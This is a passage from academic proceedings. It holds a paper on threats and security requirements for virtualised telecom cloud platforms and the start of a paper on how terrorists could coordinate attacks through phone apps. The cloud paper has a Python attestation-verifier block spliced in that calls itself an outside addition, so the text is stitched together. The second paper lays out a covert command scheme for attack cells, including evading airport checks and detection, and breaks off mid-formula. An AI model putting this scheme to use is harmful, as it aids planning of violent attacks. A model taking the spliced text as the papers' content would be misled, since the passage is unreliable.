Defence Signals Directorate (DSD) (2011). CSOC – Cyber Security Operations Centre, Available from: http://www.dsd.gov.au/infosec/csoc.htm, Accessed 10th January, 2011.
Franklin, M. and Walters, F. (2008). Homeland Security Division Faces Axe, The Australian, May 8th.
Lewis, T. (2006). Critical Infrastructure Protection in Homeland Security, Wiley Publishers, USA, ISBN 978-0-471-78628-3.
Nicholson, B. (2008). PM abandons “cumbersome” homeland security department, The Australian, December 4th.
Rudd, K. (2008). The First National Security Statement to the Parliament, Address by the Prime Minister of Australia, The Hon. Kevin Rudd MP, URL: http://www.pm.gov.au/media/speech/2008/speech_0659.cfm, Accessed 10th December, 2008.
Smith, S. (2004). Infrastructure, [Online], NSW Parliament, Available from: http://www.parliament.nsw.gov.au/prod/parlment/publications.nsf/0/C6389C30B0383F9ACA256ECF0006F610, Accessed 10th November, 2009.
TISN (Trusted Information Sharing Network) (2007). About Critical Infrastructure, Available from: http://www.tisn.gov.au, Accessed 15th July, 2009.
TISN (Trusted Information Sharing Network) (2010). The Shift To Resilience, CIR News, Vol 7, No 1.
Warren, M. and Leitch, S. (2010). Commercial Critical Systems and Critical Infrastructure Protection: A Future Research Agenda, Proceedings of the 2010 European Information Warfare Conference, Thessaloniki, Greece.
PhD Papers
Security Considerations for Virtual Platform Provisioning

Mudassar Aslam and Christian Gehrmann
Swedish Institute of Computer Science (SICS), Sweden
mudassar.aslam@sics.se
chrisg@sics.se

Abstract: The concept of virtualization is not new, but leveraging virtualization in different modes and at different layers has revolutionized its usage scenarios. Virtualization can be applied at the application layer to create a sandbox environment, at the operating system layer to virtualize shared system resources (e.g. memory, CPU), at platform level, or in any other useful hybrid scheme. When virtualization is applied at platform level, the resulting virtualized platform can run multiple virtual machines as if they were physically separate real machines. Provisioning virtualized platforms in this way is often referred to as Infrastructure-as-a-Service, or as Platform-as-a-Service when full hosting and application support is also offered. Different business models, like datacenters or telecommunication providers and operators, can get business benefits from platform virtualization due to the possibility of increased resource utilization and reduced upfront infrastructure setup expenditure. This opportunity comes together with new security issues. An organization that runs services in the form of virtual machine images on an offered platform needs security guarantees. In short, it wants evidence that the platforms it utilizes are trustworthy and that sensitive information is protected. Even if this sounds natural and straightforward, few attempts have been made to analyze in detail what these expectations mean from a security technology perspective in a realistic deployment scenario. In this paper we present a telecommunication virtualized platform provisioning scenario with two major stakeholders: the operator, who utilizes virtualized telecommunication platform resources, and the service provider, who offers such resources to operators. We make a threat analysis for this scenario and derive major security requirements from the different stakeholders’ perspectives. Through investigating a particular virtual machine provisioning use case, we take the first steps towards a better understanding of the major security obstacles with respect to platform service offerings. In the last couple of years we have seen increased activity around security for clouds regarding different usage and business models. We contribute to this important area through a thorough security analysis of a concrete deployment scenario. Finally, we use the security requirements derived through the analysis to make a comparison with contemporary related research and to identify future research challenges in the area.

Keywords: security; trust; virtualization; virtual private server; telecommunication networks; clouds
1. Introduction

In past years we have seen a strong move in the market place towards usage of virtualization technologies. The virtualization technology we discuss here is the approach in which a complete software system (including the OS) runs on top of a hypervisor. This gives the guest system the illusion of running directly upon the real hardware and is often referred to as system virtualization (Smith & Nair 2005). Virtualization allows one to run legacy applications unmodified on new hardware platforms; where the guest and the host use different instruction sets, this is realized through on-the-fly translation from one hardware instruction set to another with the assistance of a so called hypervisor or Virtual Machine Monitor (VMM). A hypervisor runs in the most privileged mode in a system and has full control over vital system resources. A hypervisor-based system not only allows instruction translation but, above all, increased system utilization, as multiple Virtual Machines (VMs) can run simultaneously on a single powerful hardware platform, opening up new business models and a new business landscape. This implies, for example, that existing services can rather easily be migrated into large computing clusters, or what is often referred to as the cloud. The term cloud in general refers to offering a service of any category, ranging from application to infrastructure. Generally known broader categories are Software-as-a-Service (SaaS), Platform-as-a-Service (PaaS) and Infrastructure-as-a-Service (IaaS), which are sometimes collectively called the SPI service models (Security Guidance for Critical Areas of Focus in Cloud Computing 2009). There are many other possible cloud based services as well, like Application-as-a-Service, Database-as-a-Service, Storage-as-a-Service, etc. This paper particularly focuses on platform virtualization, which provides a way to offer a Virtual Private Server, or IaaS in cloud terminology.

The new flexibility offered by virtualization and cloud based models has a price: increased security risks. Systems that were previously physically isolated might now run on the same machine, consequently opening up new attacks between virtual machines running simultaneously on the same hardware. A recent survey shows that despite potential benefits, companies are reluctant to migrate their businesses from existing physical platforms to more flexible, scalable and cost effective virtual platforms “due to fear about security threats and loss of control of data and systems” (CircleID 2009). This shows the importance of
careful security requirements analysis considering stakeholders’ concerns and, most importantly, of proposing ways to establish stakeholders’ trust in a business model like the cloud, which provisions virtual resources.

A telecommunication cloud presents such a use case, in which the resource provider offers Infrastructure-as-a-Service using platform virtualization. Despite the scope of a telecommunication cloud as a future service model, few attempts have been made to do a detailed security requirements analysis considering the new dynamics of the proposed systems and the trust building mechanisms required between stakeholders to make an acceptable business model. This paper focuses on these basic but important issues. We present a virtualized platform provisioning model, thereby deriving a telecommunication cloud use case. Furthermore, we focus on security requirements by considering possible security threats in such a model. The aim of this paper is to identify security requirements which are important for establishing stakeholders’ trust in offering Infrastructure-as-a-Service to telecommunication operators. The main contributions of this paper are the following:

- We present a telecommunication cloud use case where virtualized telecommunication nodes are offered to different operators.
- We identify, analyze and consolidate security requirements of the stakeholders which form the basis when creating a secure architecture for a telecommunication cloud.
- Finally, we recommend a set of security mechanisms needed to create trust between stakeholders in future telecommunication clouds.

This paper is organized as follows. In Section 2 we describe the telecommunication cloud scenario. In Section 3 we present security threats and derive major security requirements; it also identifies recommended security mechanisms for a trusted telecommunication cloud. Section 4 presents related work and we conclude in Section 5.
2. Scenario – a telecommunication cloud use case

In the preceding decade, the focus of virtual resource provisioning has been on virtualizing data centers (Berger et al. 2008), (Griffin et al. 2005), but with the rapid expansion of telecommunication networks, the user base and the services offered by the operators, there are strong reasons for operators and their resource providers to adopt more flexible business models in order to be competitive and to meet the changing and increasing demands of end-customers. In this paper we consider a resource model that is a step in this direction, allowing several operators to share a common telecommunication infrastructure. The model includes two major stakeholders: the Provider, who provisions virtual telecommunication platforms instead of physical resources, and the Operator, who operates the telecommunication network utilizing the platforms offered by the provider and hence offers services to its end-customers.

In traditional telecommunication networks, where the operator owns all physical resources, it needs to invest in an infrastructure that is able to handle the most demanding traffic peaks. As a consequence of this, the operator might need to spend on resources which remain under utilized most of the time. From the operators’ perspective, they would like to be able to pay for the exact type and number of resources they require to service their end customers’ rapidly changing demands. Similarly, the infrastructure provider must be able to rapidly provision required resources to the operators. By using the recent advancements in virtualization technologies and emerging cloud service models, the platform provider can instead offer a Telecommunication Cloud to multiple operators. Through scaling effects and efficient management of this infrastructure, this can result in better resource utilization and an overall more cost efficient solution, similar to most current cloud computing models. Furthermore, the provider can enforce strong licensing techniques restricting operators to use only provisioned resources. An overview diagram of the stated scenario is shown in Fig. 1.

We consider a model where the provider hosts and manages the physical platforms and provides the basic hypervisor layer for virtualization. This allows the provider to offer complete virtual platforms as a service which can then be used by different operators to launch their virtual machines. Whereas the provider is responsible for managing the physical platforms and the basic virtualization layer, the operators are responsible for managing all software layers of their own virtual machines, including the operating system, antivirus and firewalls. This implies that the proposed Telecommunication Cloud offers Infrastructure-as-a-Service (IaaS), as opposed to offering Platform-as-a-Service (PaaS), where the consumer does not get complete freedom (Linthicum et al. 2009). The launching of a virtual machine image and subsequently its management are done by the operator using Operator Management Clients (OMCs) through a gateway entity. The gateway entity protects the provider’s internal network from unauthorized external access.
Similarly, the provider manages the virtualized telecommunication platforms through a Provider<br />
Management Client (PMC). There are other possible network models, for example, a model with an<br />
<strong>in</strong>termediate entity which takes the responsibility of manag<strong>in</strong>g the telecommunication cloud. In such<br />
scenario, the provider outsources its virtual resources to the Cloud Management Entity (CME), which<br />
then provisions the available resources to the operators. The result<strong>in</strong>g <strong>in</strong>frastructure would allow a CME<br />
to offer virtual resources from different providers. This paper however focuses on two-role model<br />
<strong>in</strong>volv<strong>in</strong>g only a provider and operator.<br />
Figure 1: Our proposed telecommunication cloud scenario
3. Threat and security requirements
One of the most important hurdles for adopting a dynamic virtual telecommunication resource model is security. The cloud provider and the operator both fear new threats which arise from simultaneously running virtual machines of different operators on the same physical platforms. A successfully executed attack on a specific platform can leak confidential operator data, which in turn might result in severe business loss or other damage. Moreover, an attacker could use provider resources illegally if he or she could take control over the target platform. We have analyzed the scenario and identified major threats, which are summarized in Table 1. These threats have in turn been used to identify the stakeholders' security requirements, which we list in the subsequent sections together with some recommendations on security solutions meeting the requirements.
Table 1: Telecommunication cloud threats
ID  Attacker  Threat                                          Target
T1  O, A      Malicious code installation                     VMM, VMMGT, VMOPR
T2  P         Unintentional installation of hostile S/W       VMM, VMMGT
T3  A, O      Impersonate provider                            Gateway, VMMGT
T4  A, O      Impersonate a legitimate operator               Gateway, VMMGT
T5  P         Access run-time or configuration data           VMOPR
T6  A         Denial of Service attack                        Provider Network
T7  O         Repudiate VM launch                             VMMGT
T8  O         Interfere with other operators' VM              VMOPR
T9  O         Get confidential data from other operators' VM  VMOPR
O: Legitimate Operator | P: Legitimate Provider | A: Outside attacker | VMMGT: Management VM
3.1 Provider network authentication
Authentication is the binding of an identity to a principal. It is a standard security service which must be performed for any secure distributed system. Commonly used authentication mechanisms include passwords, challenge-response, certificates, etc. (Bishop 2004). With respect to connecting Operator Management Clients (OMCs), there is a need for authentication on two different levels: mutual authentication towards the provider network at the gateway, and authentication at the management VM level. The latter also applies to connecting Provider Management Clients (PMCs), to reduce threat T3. Mutual authentication between OMCs and the gateway is needed to mitigate threats T3, T4 and T6. A state-of-the-art solution would be to use existing secure session establishment protocols wherever applicable, for example using the Internet Key Exchange protocol (IKE 2005) for mutual authentication and key exchange in combination with IPsec (IPsec 2005) for establishing a virtual private network (VPN). Authentication by the management VM of connecting OMCs and PMCs could typically be done as part of the applicable management protocol (REST, Web Service, SMTP etc.) and would, for example, be certificate based (see also Section 3.3 below).
3.2 Platform integrity and authentication
In order to mitigate threats T1 and T2, there is a need for close control of the software that is executed on the virtual platforms. When the operator wants to launch its virtual machine on the provider-provisioned virtual platform, he or she should check the configuration and integrity status of the target platform prior to launching the service. This implies that every piece of code, right from the beginning of the boot process, is securely recorded in some protected storage such that the status can later be verified by connecting OMCs. The most relevant methods to consider include the Trusted Computing Group trusted boot and remote attestation principles (TCG 2003). With regard to platform authentication in a cloud scenario, the operator is actually not interested in the identity of the target platform but rather in its integrity, which is reported in remote attestation. Thus a virtual platform is authenticated if its verified configuration is trusted according to the policies that the operator applies.
3.3 Authentication, attestation and VM launch protocol
There are two important steps before the launch of a VM. First, the operator requires network authentication (section 3.1) and then remote attestation (section 3.2). From the operator's perspective, it is important that the VM launch is performed in the same session as these two steps, to ensure that the operator VM is launched on a platform which has previously been attested. Furthermore, due to platform and software licensing, the provider would be interested in protection against replay of the VM launch command and protection against later repudiation by the operator (threat T7). In order to mitigate these threats, the designed protocol should cryptographically bind the authentication, attestation and VM launch sessions. Therefore, there should be a comprehensively analyzed security protocol for authentication, attestation and VM launch. The chosen protocol shall provide replay protection, session binding and non-repudiation of VM launch.
3.4 VM isolation
VM isolation is an important security requirement for virtual resource provisioning scenarios. In the virtualized telecommunication cloud environment, the VMs of different operators run on the same physical machine, thus opening room for interfering with other operators' VMs. In order to mitigate this threat (T8, T9) it is important to ensure that operator VMs are isolated. This isolation is provided by the hypervisor layer (Chisnall 2007), (KVM 2007), (VMware 2010). Hence, the security of the whole system depends upon the correctness of the hypervisor. Hypervisors are claimed to provide isolation which is as strong as physical isolation, if not better. However, to ensure this proposition, the size of the hypervisor itself and the code/libraries it is built upon must be kept as small as possible to minimize hierarchical trust dependencies, as recommended by (Doorn 2007). Furthermore, the hypervisor implementation must meet a higher evaluation assurance level (EAL) to obtain Common Criteria certification (CC 2011). This is an important requirement in order to establish operators' trust in the behavior of the provisioned platform. The operator would then only be required to verify that the provider platform runs the certified hypervisor.
3.5 Confidentiality
Preferably, considering threat T5, the operator would like at VM launch to cryptographically bind the VM, including all its configuration such as secure credentials, to a trusted resource platform configuration. This can potentially be partly solved through use of the sealing techniques defined by the Trusted Computing Group (TCG 2003) and specified in (TCG Specification Architecture Overview 2007). The actual data protection and isolation must be provided by the hypervisor, though, and sealing techniques will only help as long as there is a hypervisor layer that the operator can trust with respect to protecting and isolating VM security-critical data (see Section 3.4).
3.6 Secure VM migration
VM migration is a process in which a running operator VM is migrated from one physical platform to another. The VM migration moves the active memory and execution state of the VM along with the VM's security credentials (e.g. keys). The provider must be able to support migration of operators' VMs that is undetectable to the operators, to allow uninterrupted access to the provisioned resources. VM migration is a resource administration tool which deals with situations like optimization of workload within provider resource pools and performing platform hardware maintenance without scheduling downtime or disrupting provisioned services. Whereas VM migration is an indispensable administrative requirement for the provider, the operator's security concern is threat T5. There must be a mechanism for secure migration of the operator's security credentials, e.g. keys. VM migration is an active research topic, which should also consider the protection of security credentials in transit. The TPM-based migratable keys (TPM 2007) could be considered in designing a secure VM migration solution.
3.7 Summary
Trust establishment between cloud stakeholders is one of the major challenges, which can be met by fulfilling the set of security requirements presented in the preceding sections. Security mechanisms like secure boot, remote attestation, cryptographic binding of the operator VM to the provider platform and a secure hypervisor are the main drivers for trust establishment. Table 2 presents a summary of the threats identified in Table 1, the corresponding security requirements and the recommended mechanisms which could be applied to mitigate those threats when designing a secure virtual resource provisioning architecture.
Table 2: Summary of threats, requirements and recommended mechanisms for a secure virtual resource provisioning architecture
Threat  Security Requirement     Security Mechanism(s)
T1      Platform Integrity       Secure boot, Remote attestation
T2      Platform Integrity       Secure boot, Remote attestation
T3      Provider Authentication  Mutual Authentication (IPsec)
T4      Operator Authentication  Mutual Authentication (IPsec)
T5      Confidentiality          VM Sealing, Strong Isolation
T5      Secure VM Migration      Ongoing research, TPM-based migratable keys
T6      Secure Provider Network  Firewall, Gateway
T7      Non-repudiation          Sign VM launch
T8      VM Isolation             Secure and certified hypervisor
T9      VM Isolation             Secure and certified hypervisor
4. Related work
Provisioning virtual servers to telecommunication operators is a new field of research. Today's state-of-the-art service offering mechanisms use virtualization and allow us to introduce telecommunication clouds. A lot of work is being done to address cloud security in general, but not for a telecommunication cloud. The Cloud Security Alliance (CSA 2009) is an organization which is striving to create awareness and draft security recommendations for the providers and consumers of the cloud. CSA has recently released (Security Guidance for Critical Areas of Focus in Cloud Computing 2009), which is an exhaustive security guidance report and covers recommendations for security requirements in different domains of the cloud infrastructure. Twelve domains have been identified in the report, covering governance to operational aspects of cloud computing. While this report is a useful tool to identify security requirements, its scope is too broad to be applied directly to a specific scenario. The recommended approach is to identify the applicability of a specific domain to the addressed scenario and then consider the security requirements identified in that domain. This paper provides a focused security requirements analysis for telecommunication clouds with emphasis on establishing technical trust between the stakeholders. The security requirements identified in our paper complement the last three domains in the CSA report, namely "Encryption and Key Management", "Identity and Access Management", and "Virtualization". The Trusted Computing Group (TCG 2003) has also recently started a new initiative called (Trusted Multi-tenant Infrastructure (TMI) 2010), which aims to define reference models for practical deployment of trusted cloud or shared infrastructures. The TMI group has not yet released any specification other than a short white paper (Cloud Computing and Security – A Natural Match 2010), which selects six specific areas of cloud computing from (Security Guidance for Critical Areas of Focus in Cloud Computing 2009) to suggest security improvements using TCG technologies. The selected areas include protecting data at rest and in transit, authentication, separation between customers, legal and regulatory issues and incident response. The white paper hence identifies the areas where TCG mechanisms can provide security and trust in clouds. These findings are in line with our proposed security mechanisms in Table 2, wherein we propose using secure boot, remote attestation and sealing capabilities to provide authentication, integrity and confidentiality.
Other than the above-mentioned initiatives which identify security requirements, the rest of the work has been focused on providing solutions for the security requirements identified in this paper. Although these solutions specifically focus on the security of virtualized data centers, the building blocks of a data center are somewhat similar to our perceived telecommunication cloud scenario. For example, both use hypervisors to compartmentalize strongly isolated virtual machines, and both scenarios necessitate trust establishment in the provisioned platforms. Therefore, we find some solutions addressing the security requirements identified in this paper. One such solution is introduced in Terra (Garfinkel et al. 2003), which is a Trusted Virtual Machine Monitor (TVMM). It fulfills the VM isolation requirement by giving the appearance of multiple boxes on a single hardware platform and running applications of varying assurance levels in the appropriate box. Terra also supports certificate-based attestation to fulfill the platform integrity requirement. Furthermore, (Garfinkel et al. 2003) also claim a high assurance level for Terra due to its small size; however, a formal proof of such a claim is lacking.
Some other papers particularly address mechanisms to fulfill the platform integrity requirement identified in this paper. (Huang & Peng 2009) and (Sailer et al. 2004) propose remote attestation which leverages TPM-based cryptographic attestations by sending the Integrity Measurement Log (IML) in combination with a TPM_Quote which is securely computed by the TPM (TPM 2007). The verifier compares the quoted response with a hash value it computes itself from the IML to check and decide about the integrity of the target platform. Similarly, (Kuhlmann et al. 2006) propose an alternative mechanism for remote attestation by introducing property-based attestations instead of cryptographic attestations to make it a scalable solution. (Haldar, Chandra & Franz 2004) also propose a similar remote attestation technique to fulfill the platform integrity requirement. All these papers mainly discuss remote attestation techniques, which are important to meet the requirements discussed in section 3.2, but need to be complemented in order to fulfill the requirements identified in section 3.3.
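The IML replay and quote comparison described above, together with the session binding that section 3.3 asks for, as an added example (not code from this paper or the works it cites): the operator-side verifier recomputes the PCR from the log, checks the quote's nonce and signature, applies an allowlist policy to each measured component, and derives the bytes the operator signs for the VM launch. The TPM's quote signature is stood in for by an HMAC under a constructed key, and the log entries, policy and nonces are constructed sample data.

```python
# Added example (not code from the paper or the works it cites): operator-side
# verification of a TPM-style attestation before a VM launch.  The measurement
# log, policy and key below are constructed sample data.
import hashlib
import hmac
from dataclasses import dataclass

PCR_INIT = b"\x00" * 20  # a TPM 1.2 PCR starts as 20 zero bytes (SHA-1 size)

# Constructed stand-in for the TPM attestation key.  A real TPM_Quote carries
# an asymmetric signature; HMAC is used only so this runs on the stdlib.
AIK_SECRET = b"constructed-aik-secret"


def extend(pcr, measurement):
    """TPM extend operation: PCR_new = SHA-1(PCR_old || measurement)."""
    return hashlib.sha1(pcr + measurement).digest()


def replay_iml(iml):
    """Recompute the PCR value from an IML of (component, digest) entries."""
    pcr = PCR_INIT
    for _component, digest in iml:
        pcr = extend(pcr, digest)
    return pcr


@dataclass(frozen=True)
class Quote:
    pcr: bytes    # PCR value reported by the TPM
    nonce: bytes  # verifier-chosen nonce passed to TPM_Quote (freshness)
    mac: bytes    # stand-in for the TPM signature over pcr || nonce


def tpm_quote(iml, nonce):
    """Platform side: quote the PCR that the measured boot produced."""
    pcr = replay_iml(iml)  # models the value the TPM accumulated during boot
    return Quote(pcr, nonce, hmac.new(AIK_SECRET, pcr + nonce, "sha256").digest())


def verify_attestation(quote, iml, expected_nonce, policy):
    """Operator side; policy maps component -> trusted digest. Returns (accepted, reason)."""
    if not hmac.compare_digest(quote.nonce, expected_nonce):
        return False, "nonce mismatch: replayed or foreign quote"
    expected_mac = hmac.new(AIK_SECRET, quote.pcr + quote.nonce, "sha256").digest()
    if not hmac.compare_digest(quote.mac, expected_mac):
        return False, "quote signature invalid"
    if not hmac.compare_digest(replay_iml(iml), quote.pcr):
        return False, "IML does not reproduce the quoted PCR: log edited or incomplete"
    for component, digest in iml:
        if policy.get(component) != digest:
            return False, "untrusted component: " + component
    return True, "platform configuration trusted"


def launch_binding(nonce, quote, vm_image_digest):
    """Bytes the operator signs as its VM launch command.

    Folding the session nonce and the quote into the signed command ties the
    launch to this attested configuration (session binding, replay protection);
    the provider keeps the signed command as evidence against repudiation (T7)."""
    return hashlib.sha256(
        b"vm-launch" + nonce + quote.pcr + quote.mac + vm_image_digest).digest()


def _sha1(data):
    return hashlib.sha1(data).digest()


# Constructed measurement log and the operator's allowlist policy.
SAMPLE_IML = [
    ("bootloader", _sha1(b"bootloader build 1")),
    ("hypervisor", _sha1(b"certified hypervisor build 7")),
    ("management-vm", _sha1(b"management vm image")),
]
OPERATOR_POLICY = dict(SAMPLE_IML)


def run_scenarios():
    """Verifier decisions for an honest platform and three failure modes."""
    nonce = b"constructed-session-nonce-1"
    honest_quote = tpm_quote(SAMPLE_IML, nonce)
    # T1: an extra module was measured; the quote is genuine but policy rejects it.
    infected_iml = SAMPLE_IML + [("unknown-module", _sha1(b"unexpected code"))]
    infected_quote = tpm_quote(infected_iml, nonce)
    return {
        "honest": verify_attestation(honest_quote, SAMPLE_IML, nonce, OPERATOR_POLICY),
        "policy_rejected": verify_attestation(
            infected_quote, infected_iml, nonce, OPERATOR_POLICY),
        # Hiding the extra entry from the log cannot make it match the quote.
        "log_edited": verify_attestation(
            infected_quote, infected_iml[:-1], nonce, OPERATOR_POLICY),
        # A quote captured in an earlier session fails the freshness check.
        "replayed": verify_attestation(
            honest_quote, SAMPLE_IML, b"constructed-session-nonce-2", OPERATOR_POLICY),
    }
```

Non-repudiation of the launch (T7) requires an asymmetric signature by the operator over the bytes that `launch_binding` returns; the HMAC here only models the TPM side and would not let the provider prove anything to a third party.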
The architecture introduced by (Jansen, Ramasamy & Schunter 2006) presents ways to protect the confidentiality of the user VM by leveraging the sealing mechanism supported by the TPM. We have also recommended the sealing mechanism in Table 2 to fulfill the confidentiality requirement. Finally, (Gasmi et al. 2007) propose a trusted channel which focuses on the integrity of the target platform in establishing a secure session. The trusted channel also features trusted computing mechanisms for establishing trust between end entities. The proposed trusted channel is targeted at secure transactions over the internet by end users. A trusted channel is not equivalent to a complete secure launch protocol with non-repudiation properties as discussed in section 3.3. However, the main principles for the design of such channels give the basic building blocks for constructing a VM launch protocol that can meet the requirements we have identified in this paper.
5. Conclusion
In this paper we have presented a scenario in which virtualized telecommunication resources, making up the telecommunication cloud, are provisioned to different telecommunication operators. We have performed a detailed security analysis of the addressed scenario, taking both stakeholders' concerns into account. We started by identifying major security threats, followed by a detailed security requirements analysis with the focus on trust establishment between stakeholders. Our results present a summary of probable security threats, stakeholders' security requirements and our recommended mechanisms to create trusted telecommunication clouds. Finally, we presented existing related work which, on comparison with our security analysis, shows that this paper consolidates the possible security requirements from the existing body of literature. However, there are some other security requirements which are identified in this paper but not addressed so far by the research community. Hence, this paper identifies open research with respect to virtual platform provisioning, and therefore may serve as the basis for identification of further research in this area.
References
Berger, S, Cáceres, R, Pendarakis, D, Sailer, R & Valdez, E 2008, 'TVDc: Managing Security in the Trusted Virtual Datacenter', SIGOPS Oper. Syst.
Bishop, M 2004, Introduction to Computer Security, Addison-Wesley Professional.
CC 2011, The Common Criteria, http://www.commoncriteriaportal.org/.
Chisnall, D 2007, The Definitive Guide to the Xen Hypervisor, Prentice Hall PTR, Upper Saddle River, NJ, USA.
CircleID 2009, Survey: Cloud Computing 'No Hype', But Fear of Security and Control Slowing Adoption, http://www.circleid.com/posts/20090226_cloud_computing_hype_security/.
'Cloud Computing and Security – A Natural Match' 2010, Trusted Computing Group (TCG), http://www.trustedcomputinggroup.org/.
CSA 2009, Cloud Security Alliance, http://www.cloudsecurityalliance.org/.
Doorn, LV 2007, 'Trusted Computing Challenges', Proceedings of the 2007 ACM Workshop on Scalable Trusted Computing, ACM, New York, NY, USA.
Garfinkel, T, Pfaff, B, Chow, J, Rosenblum, M & Boneh, D 2003, 'Terra: a Virtual Machine-based Platform for Trusted Computing', ACM Press.
Gasmi, Y, Sadeghi, A-R, Stewin, P, Unger, M & Asokan, N 2007, 'Beyond Secure Channels', Proceedings of the 2007 ACM Workshop on Scalable Trusted Computing, ACM, New York, NY, USA.
Griffin, JL, Jaeger, T, Perez, R, Sailer, R, Doorn, LV & Cáceres, R 2005, 'Trusted Virtual Domains: Toward Secure Distributed Services', In Proc. of the First Workshop on Hot Topics in System Dependability, IEEE Press.
Haldar, V, Chandra, D & Franz, M 2004, 'Semantic Remote Attestation - A Virtual Machine directed approach to Trusted Computing', USENIX Virtual Machine Research and Technology Symposium.
Huang, X & Peng, Y 2009, 'An Effective Approach for Remote Attestation in Trusted Computing', WISA 2009: Proceedings of the 2nd International Symposium on Web Information Systems and Applications, Academy Publisher, FIN-90571, Oulu, Finland.
IKE 2005, 'Internet Key Exchange (IKEv2) Protocol', Internet Engineering Task Force (IETF), RFC 4306.
IPsec 2005, 'Security Architecture for the Internet Protocol', Internet Engineering Task Force (IETF), RFC 4301.
Jansen, B, Ramasamy, HV & Schunter, M 2006, 'Flexible Integrity Protection and Verification Architecture for Virtual Machine Monitors', The Second Workshop on Advances in Trusted Computing.
Kuhlmann, D, Landfermann, R, Ramasamy, HV, Schunter, M, Ramunno, G & Vernizzi, D 2006, 'An Open Trusted Computing Architecture - Secure Virtual Machines Enabling User-Defined Policy Enforcement', www.opentc.net.
KVM 2007, Kernel Based Virtual Machine, http://www.linux-kvm.org/page/Main_Page.
Linthicum, D, Knorr, E, Gruman, G, Scheier, RL, Beckman, M & Wayner, P 2009, Cloud Computing Deep Dive, Special Report, viewed 2010, http://www.InfoWorld.com.
Ormandy, T 2007, 'An Empirical Study into the Security Exposure to Hosts of Hostile Virtualized Environments', CanSecWest.
Sailer, R, Zhang, X, Jaeger, T & Doorn, LV 2004, 'Integrity Measurement Architecture', The Proceedings of the 13th USENIX Security Symposium, San Diego, California.
Santos, N, Gummadi, KP & Rodrigues, R 2009, 'Towards Trusted Cloud Computing', Proceedings of the 2009 Conference on Hot Topics in Cloud Computing, USENIX Association, Berkeley, CA, San Diego, California.
'Security Guidance for Critical Areas of Focus in Cloud Computing' 2009, Cloud Security Alliance, V2.1, http://www.cloudsecurityalliance.org/guidance/csaguide.v2.1.pdf.
Smith, J & Nair, R 2005, Virtual Machines: Versatile Platforms for Systems and Processes, Morgan Kaufmann Publishers.
TCG 2003, Trusted Computing Group, http://www.trustedcomputinggroup.org/.
TCG Specification Architecture Overview 2007, http://www.trustedcomputinggroup.org/resources.
TPM 2007, TPM Main Specification, http://www.trustedcomputinggroup.org/resources/tpm_main_specification.
'Trusted Multi-tenant Infrastructure (TMI)' 2010, Trusted Computing Group (TCG), http://www.trustedcomputinggroup.org/developers/trusted_multitenant_infrastructure.
VMware 2010, VMware Inc., Virtualization Solutions, http://www.vmware.com/virtualization/.
A Mobile and Quick Terrorism
Anthony Desnos and Geoffroy Gueguen
Operational Cryptology and Virology Laboratory (CVO), ESIEA, France
desnos@esiea.fr
gueguen@esiea.fr
Abstract: New technologies bring significant changes into our way of life, and the mobile phone is one of them. It is an item which follows us everywhere; it has somehow become a part of our body. The fact is that nowadays mobile phones are like little but powerful computers. You can travel from one country to another without your mobile phone being controlled by the authorities, and that is an interesting characteristic. However, your mobile phone can be turned into a new weapon for modern terrorism. It will not be used as a weapon to attack a target (though it can be used in a bomb [Madrid, 2004]), but to synchronize an attack between different unknown terrorists who do not know each other. The idea is to follow a terrorist from his training in an Al Qaeda camp to the final attack. We will see how it is possible for a terrorist leader to perform and plan an attack by creating a mobile application, and by giving mobile phones (with an embedded application) to different "jihadists".
Keywords: terrorism, mobile phone, android, cryptography
1. Introduction
If terrorists want to use smart phones, they have to resolve a few questions:
How can a terrorist leader control different terrorists?
How can he establish a connection with a chosen terrorist by identifying him?
How to secure the communications and verify the identity of the leader?
How can a terrorist recognize another one in order to perform the final attack?
How do we protect the leader's identity even if some mobile phones are caught by the authorities?
We will use cryptographic techniques like the secret sharing scheme (Shamir, 1979) to efficiently and quickly perform all the attack operations, even though we have seen terrorists use old techniques (TheRegister 2011). Of course, we will show how to prevent the system from being tampered with when a terrorist has been caught, and how to prevent the leak of the leader's identity as well as that of the other terrorists. Moreover, we must protect our application with respect to controls in airports by using stealthy cryptographic techniques (Filiol, 2010) in order to prevent entropy-based detection.
In the first part, we will describe the basic equipment of a group of terrorists; next we will see how communication can be established between the leader and a "jihadist", and between the leader and different "jihadists". Finally we will discuss the consequences if a terrorist is arrested by the authorities.
2. Terrorist leader − terrorists
2.1 The beginning
During the training of each "jihadist", the leader selected a team composed of X members. For each member of the team, the leader created a shared secret (Z points, with a threshold of T), and each member of the team has:
A classic mobile phone with a SIM card,
A pre-installed application with:
– X (T - 2) integer values (encoded in the application as data),
– a password given orally (or by any other equivalent secure means).
Nowadays, it is very interesting to use a classic mobile phone, because this kind of object is very common, and moreover it is not checked at the airport. Even if a check is performed, the mobile phone has to be rooted (or jailbroken) to find a hidden secret, which is not possible as a standard procedure for every passenger.
Figure 1: Initial characteristics of a leader and jihadists
2.2 Interaction
So the leader must share a secret with each "jihadist". This secret will be used as an authentication to extract a valid password to decode a communication (for example, through an SMS).
For example, the threshold is 3, and the (integer) values of the secret sharing are:
X1, Y1,
X2, Y2,
X3, Y3,
X4 (a password transformed into an integer), Y4.
The leader has all the interesting values:
X1, Y1,
X2, Y2,
X3, Y3.
And the "jihadist":
X3, Y3,
X4, Y4.
When a leader wants to send a message to a "jihadist", he sends him X2, Y2. Next, the leader uses X1, X2, X3 to create the secret, which is then used to encode a message. The "jihadist" can decode the message with X3, X2 and X4 by solving the secret sharing, which gives the password of the message.
Figure 2: Initial exchange between a leader and a jihadist<br />
2.3 Shamir’s Secret Sharing<br />
Shamir’s Secret Sharing [SHAMIR] can implement this scheme. It comes from the idea that 2 distinct points are sufficient to define a line, 3 distinct points to define a parabola, 4 distinct points to define a cubic curve, and so on. That is, it takes k distinct points to define a polynomial of degree k − 1. To build the polynomial, choose (k − 1) coefficients a1, ..., ak−1 at random, and let a0 be the secret:<br />
Every participant (in our case, a “jihadist” and the leader) is given, for a point X of this system, a pair (X, f(X)) (where each X must be different). When k participants are present, the secret can be found; otherwise it is impossible to recover it.<br />
Our secret is our private key to encode a message.<br />
The threshold at which it is possible to find the secret is agreed between the “jihadist” and the leader to be half of the generated values.<br />
2.4 Neville-Aitken’s algorithm<br />
When the leader wants to initiate a communication with a “jihadist”, he must send him one of his elements, and the “jihadist” has to reply with one of his (it must not be the password). This procedure is mandatory to perform the calculation of the secret a0 used to encode the message.<br />
To do this we can use Neville-Aitken’s algorithm (Neville, 1992) to find a coefficient that allows us to calculate any degree of the polynomial:<br />
In this case we only want the coefficient of degree 0 (which is the key or the password), so:<br />
